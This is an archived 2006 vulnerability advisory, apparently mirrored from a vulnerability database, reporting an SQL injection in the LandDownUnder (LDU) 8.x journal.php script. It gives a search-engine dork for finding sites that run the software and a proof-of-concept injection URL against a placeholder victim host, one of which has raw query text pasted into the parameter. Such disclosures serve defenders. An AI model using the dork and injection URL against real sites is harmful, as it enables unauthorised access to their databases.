Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15523
HistoryDec 30, 2006 - 12:00 a.m.

LDU <= 8.x (journal.php) SQL Injection Vulnerability

2006-12-3000:00:00
vulners.com
22

BhhGroup.Org & Trtekforum.com

#Found By : St@rExT

script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

Script sites : http://www.neocrome.net

#Vull name : LDU <= 8.x (journal.php) SQL Injection Vulnerability

Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m=&#39;&amp;s=username&amp;w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m=&#39;&amp;s=username&amp;w=[SQL Inject]

#Contact: [email protected]

              ######## - Tum Musluman insanlar&#305;n Bayram&#305;n&#305; Kutlar&#305;m.. : &#41; - #####

################### - Ne Mutlu Turkum Diyene - ###################